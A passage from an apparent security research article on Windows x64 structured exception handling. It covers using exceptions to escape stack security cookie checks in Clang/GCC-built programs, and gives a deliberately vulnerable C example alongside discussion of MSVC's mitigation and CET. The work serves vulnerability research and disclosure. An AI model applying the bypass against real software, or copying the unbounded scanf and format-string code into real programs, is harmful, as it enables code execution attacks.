        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;
</code></pre><p>For C/C++, <code>__C_specific_handler</code> leverages the <code>ExceptionData</code> field to store a <code>SCOPE_TABLE</code> structure. Like the <code>IMAGE_RUNTIME_FUNCTION_ENTRY</code> parent structure, each <code>ScopeRecord</code> has a begin/end address, but this time we have a handler and jump target as well. The begin/end address specifies the <strong>scope</strong> or &quot;region of code&quot; to &quot;protect&quot;. The last two fields store offsets to your SEH exception filter and exception handler.</p><pre><code class="language-c">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;

// Example filter; real filters typically inspect GetExceptionCode().
int MyExceptionFilter(void) {
	return EXCEPTION_EXECUTE_HANDLER;
}

int main() {
	__try {
		*(int*)0 = 0xDEADBEEF;
	} __except(MyExceptionFilter()) {
		printf(&quot;My exception handler!\n&quot;);
	}
	return 0;
}
</code></pre><p>Exception filters go inside the parentheses of your <code>__except</code> block. In this example, <code>MyExceptionFilter</code> is responsible for determining whether the <code>__except</code> handler block should be called for a given exception. Exception filters often perform conditional checks, such as whether the exception code matches something specific. Filters can return the following results:</p><ol><li><code>EXCEPTION_CONTINUE_EXECUTION</code> - Indicates that execution should continue where the exception occurred.</li><li><code>EXCEPTION_CONTINUE_SEARCH</code> - Continue the search for an exception handler.</li><li><code>EXCEPTION_EXECUTE_HANDLER</code> - Execute the handler block. In the example code, <code>My exception handler!</code> would only be printed if <code>MyExceptionFilter</code> returned this value.</li></ol><p>Exception filters and handlers are defined in the <code>ScopeRecord</code> structure as the <code>HandlerAddress</code> and <code>JumpTarget</code> offsets. If the <code>HandlerAddress</code> is 1, the exception handler (<code>JumpTarget</code>) is executed for all exceptions.</p><p>You can find the source code for <code>__C_specific_handler</code> included with the MSVCRT since it needs to support static compilation into binaries. On my installation of Visual Studio, the relevant source file is located at <code>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\crt\src\amd64\chandler.c</code>.</p><h3 id="the-exception-dispatching-process">The Exception Dispatching Process</h3><p>Before we continue, I want to clarify the fundamental distinction between the <code>UNW_FLAG_EHANDLER</code> and <code>UNW_FLAG_UHANDLER</code> flags in the <code>UNWIND_INFO</code> structure.</p><p>When an exception occurs, <code>RtlDispatchException</code> is the first function to be called. 
<code>RtlDispatchException</code> will create a temporary copy of the <code>CONTEXT</code> record (containing the state of registers, etc.) and &quot;virtually unwind&quot; the stack searching for exception handlers to call. Unwinding means undoing the modifications done to the stack (and registers) by the prolog/epilog of functions in the call stack. If a function has a corresponding <code>UNWIND_INFO</code> structure with the <code>UNW_FLAG_EHANDLER</code> flag, its exception handler is called.</p><p>If the handler returns <code>EXCEPTION_CONTINUE_EXECUTION</code>, execution continues right where the exception occurred (which means the exception was &quot;handled&quot;). Note that the changes made to the temporary <code>CONTEXT</code> copy <em>will not be reflected if execution were to continue</em> (i.e. if virtual unwind modified <code>Rcx</code> register, that doesn&apos;t change <code>Rcx</code> when execution continues).</p><p>If the handler returns <code>EXCEPTION_CONTINUE_SEARCH</code>, the virtual unwinding process continues, looking for the next function with the <code>UNW_FLAG_EHANDLER</code> flag.</p><p>In the context of the C-specific language handler, the exception filter specified by the &quot;handler address&quot; can return the two results above and <code>EXCEPTION_EXECUTE_HANDLER</code>. In this case, even though we are in the context of <code>RtlDispatchException</code>, <code>__C_specific_handler</code> will call <code>RtlUnwind</code> to <strong>unwind</strong> execution to the handler specified by the &quot;jump target&quot;.</p><p><code>RtlUnwind</code> is incredibly similar to <code>RtlDispatchException</code>, but it has a few notable differences. First, the context record modified by the unwinding process in this function <em>will</em> be reflected when execution continues. This is because <code>RtlUnwind</code> is intended to get both the stack and registers into the state corresponding to the target exception handler&apos;s function. 
So, for example, if you had an exception handler in a parent function of where the exception occurred, <code>RtlUnwind</code> is responsible for making sure that <code>Rsp</code> is corrected such that you can access any local variables from the context of your parent function as well as the values in its nonvolatile registers.</p><p>The second significant difference is that only &quot;termination&quot; or unwind handlers are called, aka functions with an <code>UNWIND_INFO</code> structure specifying the <code>UNW_FLAG_UHANDLER</code> flag. A good example of an unwind handler would be a <code>__try</code>/<code>__finally</code> block intended to free resources rather than catch an exception.</p><p><code>RtlUnwind</code> will unwind the stack, calling relevant unwind handlers until the &quot;target frame&quot; is reached. The target frame is generally the stack frame for the exception handler it is trying to unwind to. When reached, <code>RtlUnwind</code> passes the <strong>modified</strong> context record to <code>RtlRestoreContext</code>, which is responsible for continuing execution at the target handler.</p><p>We&apos;re going to cover <code>RtlDispatchException</code> and <code>RtlUnwind</code> further in later sections, but if you&apos;d like to learn more outside of this article, check out the publicly leaked Windows Research Kernel (WRK), which contains the source code for <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L114">RtlDispatchException</a> and <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L510">RtlUnwind</a>.</p><p>Although we&apos;ve gone over how Structured Exception Handling works &quot;under the hood&quot; to an extent, much was simplified for the purposes of this article. 
If you&apos;re interested in learning more, I would encourage you to check out <a href="https://auscitte.github.io/posts/Exception-Directory-pefile">this article</a> by <a href="https://github.com/Auscitte">Ry Auscitte</a>, who goes into even more detail.</p><p>We&apos;ve explored the existing mitigations against stack-based attacks and how Structured Exception Handling works. In the following sections, we&apos;ll discuss the practical approaches I propose to simplify the exploitation of stack overflow vulnerabilities.</p><h1 id="bypassing-security-cookies">Bypassing Security Cookies</h1><h2 id="example">Example</h2><pre><code class="language-c++">#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;

void GetString() {
	char tempBuffer[16];

	scanf(&quot;%s&quot;, tempBuffer);
	printf(tempBuffer);
}

int main() {
	__try {
		GetString();
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf(&quot;Something bad happened!\n&quot;);
	}
	return 0;
}
</code></pre><p>Let&apos;s start with an example of a simple vulnerable application I&apos;ve compiled using Clang/LLVM in Visual Studio. The buffer overflow is simple: <code>scanf</code> reads a string into the <code>tempBuffer</code> stack variable without any bound checks.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/qO3h4xa.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>If we take a look at the function in IDA Pro, there is a significant challenge preventing us from exploiting this overflow primitive- the security cookie check at the epilog of the function. Since the return address is right &quot;after&quot; the security cookie on the stack, we couldn&apos;t modify it without also corrupting the cookie. This would prevent us from gaining code execution since the program would crash before the <code>ret</code> instruction.</p><p>What can we do? Existing approaches to these scenarios include all of the methods we discussed to bypass security cookies, such as trying to leak it. For example, if the attacker had access to the <code>stdout</code> of this program, they could use <code>printf</code> to leak the security cookie on the stack. However, the issue they&apos;d run into is that the program would exit soon after. Even if they could trigger another execution, a new random cookie would be generated.</p><p>This is where our new methodology can start to shine. Our exploit fails if we corrupt the return address and hit the <code>__security_check_cookie</code> check. <em>What if we...</em> <strong>corrupted the stack and triggered an exception</strong> (e.g. with a bad format string)?</p><pre><code class="language-c++">int main() {
	__try {
		GetString();
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf(&quot;Something bad happened!\n&quot;);
	}
	return 0;
}
</code></pre><p>Since <code>main</code> has a &quot;catch-all&quot; exception handler, the program would print <code>Something bad happened!</code> and return. The security cookie check would never be reached because the exception redirected execution to the handler! Also, because <code>main</code> does not have any stack variables itself, it has no security cookie check. If we used our overflow to corrupt the return address of <code>main</code> rather than <code>GetString</code>, once <code>main</code> returns after the exception is handled, we&apos;d gain control over what code is executed!</p><p>This example relies on an overflow vulnerability, a method of triggering an exception, and a parent function having a &quot;catch-all&quot; exception handler. These first two requirements are relatively straightforward as 1) security cookies are only relevant for overflow scenarios, and 2) causing an exception is relatively easy if you can corrupt local variables.</p><p>What about the last requirement that the context in which you have an overflow vulnerability also contains a parent function with a catch-all handler? That is a much higher bar. Fortunately, this is where we can abuse how unwinding works.</p><p>How did the unwinding process determine that it should call <code>main</code>&apos;s exception handler? When <code>main</code> called <code>GetString</code>, the <code>Rip</code> register was pushed on the stack as the return address <code>GetString</code> should return to. 
The unwinding process <em>uses this return address on the stack</em> while searching for a parent function that contains an exception handler.</p><p>If we have a leak of the location for any module in the process that contains a C-specific exception handler where 1) the exception filter returns <code>EXCEPTION_EXECUTE_HANDLER</code> and 2) the handler will <code>ret</code> without a security cookie check, then we don&apos;t need a desirable parent in our stack at all!</p><p>By replacing the parent return address on the stack with an address protected by a &quot;desirable&quot; exception handler which meets the previous requirements, the unwinding process will pass the exception to the fake parent&apos;s handler, which will <code>ret</code> into an address we control on the stack.</p><p>Finding these &quot;desirable&quot; handlers can be easier than it may seem. For example, if we statically compile the previous barebone example application, we already have several candidates to choose from.</p><pre><code>[RUNTIME_FUNCTION]
... 
	[UNWIND_INFO]
	...  
	Flags: UNW_FLAG_EHANDLER
	Unwind codes: .ALLOCSTACK 0x18
		[SCOPE_TABLE]
		Scope 0
		BeginAddress:                  0x16cb
		EndAddress:                    0x1755
		HandlerAddress:                0x10314
			push rbp
			mov rbp, rdx
			mov rax, qword ptr [rcx]
			xor ecx, ecx
			cmp dword ptr [rax], 0xc0000005
			sete cl
			mov eax, ecx
			pop rbp
			ret 
		JumpTarget:                    0x1755
			xor al, al
			add rsp, 0x18
			ret 
</code></pre><p>Above is an excerpt from a tool I wrote to dump C-specific exception handlers. These structures correspond to the <code>__scrt_is_nonwritable_in_current_image</code> function in the MSVCRT. Look at the exception filter&apos;s disassembly. If we can generate an access violation exception (e.g. by reading/writing an invalid pointer), the exception handler (jump target) would be executed, returning to any address of our choice.</p><h2 id="theory">Theory</h2><p>As we covered earlier, using exceptions to escape security cookies is not new. In the past, however, the methods have involved x86-specific weaknesses, such as the exception handler pointer being stored on the stack. This new approach works with 64-bit applications by leveraging existing <em>legitimate</em> exception handlers.</p><p>Taking a step back, let&apos;s look at this attack as a generic methodology. If you...</p><!--kg-card-begin: markdown--><ol>
<li>Have a stack overflow primitive.</li>
<li>Can trigger an exception before a security cookie check.</li>
<li>Know the location of any module in the process that contains a region of code protected by an exception handler...
<ul>
<li>Whose C-specific exception filter (handler address) returns <code>EXCEPTION_EXECUTE_HANDLER</code> for the exception you can generate.</li>
<li>Whose C-specific exception handler (jump target) <code>ret</code>&apos;s without a security cookie check.</li>
</ul>
</li>
<li>Meet specific compiler requirements (discussed later).</li>
</ol>
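As a rough sketch of how one might begin hunting for modules that satisfy requirement 3, the exception directory can be walked with nothing but the standard library. This is a simplified illustration, not a complete scanner: it assumes the module is already mapped (so RVAs index the buffer directly), and `ehandler_entries` plus the sample data are hypothetical names.

```python
import struct

UNW_FLAG_EHANDLER = 0x1  # Flags bit in UNWIND_INFO

def ehandler_entries(exc_dir: bytes, image: bytes):
    # IMAGE_RUNTIME_FUNCTION_ENTRY is three DWORDs:
    # BeginAddress, EndAddress, UnwindData (RVA of the UNWIND_INFO).
    count = len(exc_dir) // 12  # directory size / sizeof(entry)
    for i in range(count):
        begin, end, unwind_rva = struct.unpack_from("<III", exc_dir, i * 12)
        # Byte 0 of UNWIND_INFO packs Version (low 3 bits) and Flags (high 5 bits).
        if (image[unwind_rva] >> 3) & UNW_FLAG_EHANDLER:
            yield begin, end
```

Each range yielded protects code with a registered exception handler; filtering for a desirable filter/jump-target pair would additionally require parsing the language-specific handler and its scope table.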
<!--kg-card-end: markdown--><p>You can spoof your call stack to include a region of code protected by the desirable exception handler, trigger an exception, and bypass the security cookie check entirely.</p><h2 id="are-all-compilers-impacted">Are All Compilers Impacted?</h2><h3 id="seh-security-cookie-check">SEH Security Cookie Check</h3><p>When I was parsing the exception handlers registered for modules such as <code>ntdll.dll</code>, I was confused to see that only 203 out of 713 exception handlers were set to the expected <code>__C_specific_handler</code> function. Here is a breakdown of the handlers for my version of <code>ntdll.dll</code>:</p><ul><li>713 total runtime function entries with a registered exception or termination handler</li><li>203 entries matched <code>__C_specific_handler</code></li><li>454 entries matched <code>__GSHandlerCheck</code>?</li><li>48 entries matched <code>__GSHandlerCheck_SEH</code>?</li><li>5 entries matched <code>LdrpICallHandler</code></li><li>1 entry matched <code>KiUserApcHandler</code></li><li>1 entry matched <code>RtlpExceptionHandler</code></li><li>1 entry matched <code>RtlpUnwindHandler</code></li></ul><p>The two <code>__GSHandlerCheck</code> functions caught my eye. What were these exception handlers being used for?</p><!--kg-card-begin: markdown--><ol>
<li><code>__GSHandlerCheck</code> - This handler takes an undocumented structure from the <code>UNWIND_INFO</code>&apos;s <code>ExceptionData</code> field and passes it to <code>__GSHandlerCheckCommon</code>. If this call succeeds, <code>__GSHandlerCheck</code> returns <code>EXCEPTION_EXECUTE_HANDLER</code>.
<ul>
<li><code>__GSHandlerCheckCommon</code> parses this undocumented structure to find the location of the security cookie for the function the exception was occurring in. Then, it emulates the cookie check usually found in the epilog of a function by XOR&apos;ing the cookie from the stack and jumping to <code>__security_check_cookie</code>.</li>
</ul>
</li>
<li><code>__GSHandlerCheck_SEH</code> - This function does nearly the same thing as <code>__GSHandlerCheck</code>, except after checking the security cookie, it calls <code>__C_specific_handler</code>.</li>
</ol>
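The emulated check is simple to picture. Below is a minimal sketch in Python (with hypothetical values; the real code reads the cookie slot out of the faulting function's stack frame) of the XOR-and-compare that `__GSHandlerCheckCommon` feeds into `__security_check_cookie`:

```python
SECURITY_COOKIE = 0x00002B992DDFA232  # hypothetical per-module cookie

def store_cookie(rsp: int) -> int:
    # Prolog: the cookie is XOR'd with RSP before being stored on the stack.
    return SECURITY_COOKIE ^ rsp

def check_cookie(stored: int, rsp: int) -> bool:
    # Epilog: mov rcx, [rsp+disp]; xor rcx, rsp; call __security_check_cookie
    return (stored ^ rsp) == SECURITY_COOKIE

rsp = 0x000000C8D92FF7A0  # hypothetical frame address
assert check_cookie(store_cookie(rsp), rsp)             # intact frame passes
assert not check_cookie(store_cookie(rsp) ^ 0x41, rsp)  # corrupted slot fails
```

Because this check runs before the unwinder dispatches to any handler, an attacker who corrupted the cookie slot cannot escape into the exception handler without first predicting the cookie.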
<!--kg-card-end: markdown--><p>Taking a look at the functions that <code>__GSHandlerCheck</code> and <code>__GSHandlerCheck_SEH</code> were assigned to revealed that all of them had security cookie checks built into them. The <code>__GSHandlerCheck_SEH</code> variant appeared to be used in functions that <em>also had an exception handler</em>, whereas <code>__GSHandlerCheck</code> was used in functions with only a security cookie check.</p><h3 id="msvc-mitigation">MSVC Mitigation</h3><pre><code class="language-c++">void GetString() {
	char tempBuffer[16];

	scanf(&quot;%s&quot;, tempBuffer);
	printf(tempBuffer);
}
</code></pre><p>This was a smart mitigation by Microsoft. The purpose behind these exception handlers is to prevent attackers from being able to escape a security cookie check by causing an exception. For example, take a look at what happens when I compile the previous <code>GetString</code> function using the MSVC++ compiler:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/bDjtjHo.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>Although <code>GetString</code> does not use an exception handler, it is built with one anyway. The disassembly above shows that the unwind handler is defined as <code>__GSHandlerCheck</code>. Even if an attacker could cause an exception in <code>GetString</code> (e.g. with a bad format string), before unwinding the stack, <code>__GSHandlerCheck</code> would be called, and a security cookie check would occur- preventing the bypass. Additionally, there are <code>__GSHandlerCheck</code> variants for several other common &quot;language-specific&quot; handlers such as <code>__GSHandlerCheck_EH</code> for C++&apos;s <code>__CxxFrameHandler3</code>.</p><p>Outside of our example, this is an effective mechanism that makes abuse of exceptions <strong>in applications that use the MSVC compiler</strong> significantly more difficult. With this mitigation, an attacker would need to predict the security cookie of the function they can cause an overflow in. Note that this doesn&apos;t mean an attacker knows the security cookie for all functions.</p><p>If an attacker could get around the initial security cookie, they could likely leverage ROP. There are some advanced attacks with exceptions we&apos;ll discuss that can provide more powerful primitives than ROP, however. 
Additionally, as we&apos;ll review in a later section, exceptions can be a solid alternative to ROP in environments that use the MSVC compiler and hardware mitigations like Intel&apos;s <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">Control Flow Enforcement Technology</a> (CET).</p><h3 id="what-about-other-compilers">What About Other Compilers?</h3><h4 id="clangllvm">Clang/LLVM</h4><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/qO3h4xa.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>For the original <code>GetString</code> example, I used Clang/LLVM in Visual Studio, which <strong>does not use the <code>__GSHandlerCheck</code> mitigation for functions with security cookie checks</strong>. This means that any application compiled with Clang/LLVM at the time of writing is vulnerable.</p><h4 id="gcc">GCC</h4><p>Although GCC does not support SEH-style <code>__try</code>/<code>__except</code> blocks, it still uses SEH for C++ exceptions. To compile the application with GCC, we can replace the <code>__try</code>/<code>__except</code> block in our main function with a C++ <code>try</code>/<code>catch</code> block.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/n8RoTU5.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>As you can see, there is no unwind block for <code>GetString</code>, demonstrating that applications compiled with GCC are also vulnerable to this attack.</p><h4 id="honorable-mentions">Honorable Mentions</h4><p>A side note- several compiled languages outside of C/C++ for Windows, like Rust and GoLang, do not have an equivalent to the <code>__GSHandlerCheck</code> mitigation. 
But, of course, these languages are designed to be inherently safe against these vulnerabilities in the first place, assuming developers don&apos;t use the <code>unsafe</code> functionality.</p><h3 id="most-applications-use-msvc-though%E2%80%A6-right">Most Applications Use MSVC, Though&#x2026; Right?</h3><p>It may seem as if the threat of this attack is reduced on Windows because of the MSVC mitigation. However, although many applications are compiled with MSVC, Clang/GCC is still frequently used, especially for cross-platform applications.</p><p>I&apos;ll give you a great example. What if I told you that the top three browsers on Windows are vulnerable to this attack?</p><p><a href="https://blog.llvm.org/2018/03/clang-is-now-used-to-build-chrome-for.html">Google Chrome</a>, <a href="https://www.mozilla.org/en-US/firefox/63.0beta/releasenotes#note-787678">Firefox</a>, and (ironically) Microsoft Edge use Clang/LLVM, which does not have a <code>__GSHandlerCheck</code> mitigation equivalent (<em>yet</em>). This means that if there was a stack overflow vulnerability in the browser you might be reading this article on, an attacker could potentially abuse exceptions to escape security cookie checks!</p><p>The wrong takeaway would be that developers should use MSVC over its alternatives or that this is somehow the fault of Clang/GCC&apos;s developers. Yes, applications compiled with Clang/GCC are not protected against this attack at the time of writing, but that can change. Microsoft should proactively work with compiler developers to share the mitigations developed for MSVC. This would only help make the ecosystem more secure as a whole.</p><h3 id="%E2%80%A6-microsoft-has-known-about-this-for-how-long">&#x2026; Microsoft Has Known About This for How Long?</h3><p>One question that caught my curiosity was, &quot;<em>How long has Microsoft known about the attack of abusing exceptions to escape security cookies?</em>&quot;. 
Several old versions of 64-bit binaries I looked at seemed to contain the <code>__GSHandlerCheck</code> function.</p><p>To pin down a date more conclusively, I sought out several old versions of Windows and checked if their <code>ntdll</code> binaries contained <code>__GSHandlerCheck</code>. I was shocked to find an <code>ntdll</code> binary <strong>signed in 2008</strong> for Windows Vista with this mitigation in place. This suggests that Microsoft has known about this attack for at least 15 years!</p><p>Now that we&apos;ve introduced the trivial implementation of Exception Oriented Programming for stack overflow vulnerabilities, let&apos;s revisit the SEH unwinding process and explore advanced attacks.</p><h1 id="an-alternative-to-rop">An Alternative to ROP</h1><h2 id="background-1">Background</h2><h3 id="unwind-operations">Unwind Operations</h3><pre><code class="language-c">typedef struct _UNWIND_INFO {
	unsigned char Version : 3;
	unsigned char Flags : 5;
	unsigned char SizeOfProlog;
	unsigned char CountOfCodes;
	unsigned char FrameRegister : 4;
	unsigned char FrameOffset : 4;
	UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&amp;~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;
</code></pre><p>In an earlier section about the exception directory and unwind info structure, we skipped over the <code>UNWIND_CODE</code> structure as it was irrelevant at the time.</p><pre><code class="language-c">typedef union _UNWIND_CODE {
	struct {
		unsigned char CodeOffset;
		unsigned char UnwindOp : 4;
		unsigned char OpInfo : 4;
	};
	unsigned short FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;
</code></pre><p><code>UNWIND_CODE</code> entries specify the operations required to &quot;unwind&quot; (or undo) the changes a given function&apos;s prolog has made to registers or the stack. Here are the various <a href="https://learn.microsoft.com/en-us/cpp/build/exception-handling-x64">documented</a> operations an <code>UNWIND_CODE</code> structure can contain:</p><ol><li><code>UWOP_PUSH_NONVOL</code> - This operation specifies that a nonvolatile integer register was pushed to the stack. The <code>OpInfo</code> field specifies what register was pushed. For example, if the prolog of a function contained <code>push rbp</code>, you would see a corresponding <code>UWOP_PUSH_NONVOL</code> operation.</li><li><code>UWOP_ALLOC_LARGE</code> / <code>UWOP_ALLOC_SMALL</code> - These operations specify that a specific size was allocated on the stack. You would expect to see these operations for instructions like <code>sub rsp, 0xABC</code>.</li><li><code>UWOP_SET_FPREG</code> - Specifies the frame pointer register and some offset of <code>rsp</code>. This operation is only used in functions that need a frame pointer in the first place, such as those that need dynamic stack allocations. An example instruction for this operation would include <code>lea rbp, [rsp+offset]</code>.</li><li><code>UWOP_SAVE_NONVOL</code> / <code>UWOP_SAVE_NONVOL_FAR</code> - These operations specify that a nonvolatile integer register was saved on the stack using a <code>mov</code> instruction rather than a <code>push</code>. Similar to <code>UWOP_PUSH_NONVOL</code>, the specific register is contained in the <code>OpInfo</code> field.</li><li><code>UWOP_SAVE_XMM128</code> / <code>UWOP_SAVE_XMM128_FAR</code> - These operations are used to save XMM register values.</li><li><code>UWOP_PUSH_MACHFRAME</code> - This is a special type of operation that indicates the function is a hardware interrupt or exception handler that receives a &quot;machine frame&quot; from the stack. 
This frame contains information about the state of various registers at the time the interrupt/exception occurred. A user-mode example of a function with this operation is <code>ntdll!KiUserExceptionDispatcher</code>.</li></ol><p>With a basic understanding of how the dispatcher can unwind the effects of various functions, let&apos;s go through an example.</p><h3 id="dumping-the-exception-directory-of-ntdll">Dumping the Exception Directory of NTDLL</h3><p>As a small demo of everything we&apos;ve learned, we can use the Python <a href="https://github.com/erocarrera/pefile">pefile</a> package to enumerate the exception directory of any PE module. Here is a small script that will print the runtime function entries of a binary specified by the first argument.</p><pre><code class="language-python">import sys
import pefile

pe = pefile.PE(sys.argv[1])
for runtime_function in pe.DIRECTORY_ENTRY_EXCEPTION:
    print(&quot;\n&quot;.join(runtime_function.struct.dump()))
    if hasattr(runtime_function, &quot;unwindinfo&quot;) and \
       runtime_function.unwindinfo is not None:
        print(&quot;\n\t&quot;.join(runtime_function.unwindinfo.dump()))
</code></pre><p>The <code>ntdll.dll</code> on my machine produced 4884 unique runtime function entries. This doesn&apos;t mean that there are 4884 functions in <code>ntdll.dll</code> with an exception handler; many entries contain only the operations needed to unwind a given function.</p><pre><code>[RUNTIME_FUNCTION]
0x168A40   0x0   BeginAddress:                  0x4C270   
0x168A44   0x4   EndAddress:                    0x4C45F   
0x168A48   0x8   UnwindData:                    0x146D50  
    [UNWIND_INFO]
    0x143F50   0x0   Version:                       0x1       
    0x143F50   0x0   Flags:                         0x3       
    0x143F51   0x1   SizeOfProlog:                  0x1F      
    0x143F52   0x2   CountOfCodes:                  0x8       
    0x143F53   0x3   FrameRegister:                 0x0       
    0x143F53   0x3   FrameOffset:                   0x0       
    0x143F64   0x14  ExceptionHandler:              0x9CC44   
    Flags: UNW_FLAG_EHANDLER, UNW_FLAG_UHANDLER
    Unwind codes: .ALLOCSTACK 0x70; .PUSHREG R15; .PUSHREG R14; .PUSHREG R13; .PUSHREG R12; .PUSHREG RDI; .PUSHREG RSI; .PUSHREG RBX
</code></pre><p>I&apos;ve noted a couple of times that the unwind operations are there to &quot;undo&quot; the prolog of the function. I&apos;d like to show a practical example of this. Above, we have the runtime function entry for <code>ntdll!RtlQueryAtomInAtomTable</code>. Look at the instructions in the epilog of the function (intended to &quot;restore&quot; the changes of the prolog) and see if you notice a pattern with the unwind operations:</p><pre><code class="language-c">RtlQueryAtomInAtomTable proc near
; __unwind { // __GSHandlerCheck_SEH
; PROLOG
; ...
; FUNCTION CONTENT
; ...
mov     rcx, [rsp+0A8h+var_48]
xor     rcx, rsp        ; StackCookie
call    __security_check_cookie
; EPILOG
add     rsp, 70h			; .ALLOCSTACK 0x70
pop     r15				; .PUSHREG R15
pop     r14				; .PUSHREG R14
pop     r13				; .PUSHREG R13
pop     r12				; .PUSHREG R12
pop     rdi				; .PUSHREG RDI
pop     rsi				; .PUSHREG RSI
pop     rbx				; .PUSHREG RBX
retn
; }
RtlQueryAtomInAtomTable endp
</code></pre><p>The instructions in the epilog match the unwind operations and occur in the same order too! This is why runtime function entries are critical to the unwinding process. They effectively tell you how to restore the state of the stack and registers at any point in time, even if you&apos;re in the middle of executing a function. Without this context, writing a reliable unwinding mechanism to support arbitrary continuation at an exception handler would be much more challenging.</p><h3 id="what-about-cet-shadow-stacks">What About CET / Shadow Stacks?</h3><p>An interesting mitigation we have not yet covered is Hardware-enforced Stack Protection, otherwise known as <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">Control-flow Enforcement Technology</a> (CET) for Intel CPUs and shadow stacks for AMD CPUs.</p><p>At a high level, when a function is called and a return address is pushed on the regular stack, a copy of that return address is also pushed on a &quot;shadow stack&quot; region. When the function returns, the address on the normal stack, which could have been corrupted by an attacker, is compared with the value on the shadow stack. If these values don&apos;t match, the program is terminated.</p><p>This is an opt-in mitigation, meaning you won&apos;t find it turned on by default. In 2021, Google Security <a href="https://security.googleblog.com/2021/05/enabling-hardware-enforced-stack.html">wrote a blog</a> about the work that went into enabling shadow stacks for Chrome. Although shadow stacks certainly aren&apos;t commonplace for most applications, it&apos;s a mitigation we may see increased adoption of in the future as it becomes more standardized.</p><p>This article is not intended to be a comprehensive look into how shadow stacks work in practice. 
If you&apos;re curious and want to learn more about specific implementation details, check out &quot;<a href="https://windows-internals.com/cet-on-windows/"><em>RIP ROP: CET Internals in Windows 20H1</em></a>&quot; by <a href="https://twitter.com/yarden_shafir">Yarden Shafir</a> and <a href="https://twitter.com/aionescu">Alex Ionescu</a>.</p><p>Going back to our trivial implementation of Exception Oriented Programming, let&apos;s say we are in the context of a process with Hardware-enforced Stack Protection. Even if we did escape a security cookie check by throwing an exception into a handler without one, when the handler returns, our corrupted return address on the stack would not match what&apos;s on the shadow stack and thus prevent our attack.</p><h2 id="core-concepts">Core Concepts</h2><p>In a classical ROP attack, the epilogues of functions are chained together to perform various operations, such as modifying registers and the stack, before returning to a function, simulating a call. Security cookies initially posed a significant challenge to ROP, as you typically couldn&apos;t modify the return address without also corrupting the cookie. With the next generation of system mitigations like shadow stacks, ROP is only becoming more challenging of an attack to leverage in real-world scenarios.</p><p>The trivial approach of escaping a security cookie check by throwing an exception only scratches the surface of what is possible through the unwinding process.</p><p>Here is a quick reminder about how exception dispatching works from a high level:</p><!--kg-card-begin: markdown--><ol>
<li><code>RtlDispatchException</code> is called, which &quot;virtually unwinds&quot; the stack and calls the exception handlers for functions with the <code>UNW_FLAG_EHANDLER</code> flag in their <code>UNWIND_INFO</code> structure.
<ul>
<li>If a handler returns <code>EXCEPTION_CONTINUE_EXECUTION</code>, the virtual unwinding process is halted, and execution continues where the exception occurred, <strong>with the original state of the registers</strong>.</li>
<li>If a handler returns <code>EXCEPTION_CONTINUE_SEARCH</code>, the virtual unwinding process continues for other exception handlers.</li>
<li>If we are in the context of the C-specific language handler and the exception filter (handler address) returns <code>EXCEPTION_EXECUTE_HANDLER</code>, <code>RtlUnwind</code> is called.</li>
</ul>
</li>
<li>If <code>RtlUnwind</code> is called (i.e. by <code>__C_specific_handler</code>), the state of the stack/registers is unwound to continue execution at the C-specific exception handler (jump target). Unlike &quot;virtual&quot; unwinding, changes made to the <code>CONTEXT</code> structure by unwind operations <strong>will be reflected</strong> when execution continues at the handler.</li>
</ol>
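As a rough illustration of the dispatch flow above, here is a toy Python model of the filter dispositions. This is a deliberately simplified sketch; the real logic lives in `RtlDispatchException` and `__C_specific_handler`, and the frame/filter shapes here are invented for illustration:

```python
# Disposition constants match their winnt.h values.
EXCEPTION_CONTINUE_EXECUTION = -1
EXCEPTION_CONTINUE_SEARCH = 0
EXCEPTION_EXECUTE_HANDLER = 1

def dispatch_exception(call_stack, exception_code):
    """Walk the (virtually unwound) call stack, asking each frame's filter what to do."""
    for frame in call_stack:
        exception_filter = frame.get("filter")
        if exception_filter is None:        # no UNW_FLAG_EHANDLER: keep unwinding
            continue
        disposition = exception_filter(exception_code)
        if disposition == EXCEPTION_CONTINUE_EXECUTION:
            # halt virtual unwinding, resume at the faulting instruction
            return ("resume", frame["name"])
        if disposition == EXCEPTION_EXECUTE_HANDLER:
            # RtlUnwind is invoked to land at this frame's jump target
            return ("unwind", frame["name"])
        # EXCEPTION_CONTINUE_SEARCH: fall through to the next frame
    return ("unhandled", None)

stack = [
    {"name": "leaf"},                                             # no handler at all
    {"name": "parent", "filter": lambda code: EXCEPTION_CONTINUE_SEARCH},
    {"name": "grandparent", "filter": lambda code: EXCEPTION_EXECUTE_HANDLER},
]
print(dispatch_exception(stack, 0xC0000005))  # ('unwind', 'grandparent')
```

The key takeaway for the attack: whoever controls the order of frames in `call_stack` controls which handler "wins".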
